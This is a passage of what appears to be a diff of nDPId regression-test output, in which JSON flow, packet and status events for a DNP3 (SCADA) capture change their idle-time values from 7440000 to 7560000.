-00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-data-len":3957,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1097505644006} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":352,"packets-processed":351,"total-skipped-flows":0,"total-l4-data-len":5682,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1097507785883} 
-00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":445,"packets-processed":444,"total-skipped-flows":0,"total-l4-data-len":7101,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":5,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1097510947092} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":466,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1097510950374,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":472,"packets-processed":471,"total-skipped-flows":0,"total-l4-data-len":7296,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1097512255234} -00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097512255234,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1097512255234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097512255234,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBpNAAIAG4CoKAAAICgAAAwSgTiANrtDCAAAAAHAC\/\/895AAAAgQFtAEBBAI="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097512255234,"flow_last_seen":1097512255236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097512255236,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1184,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": 
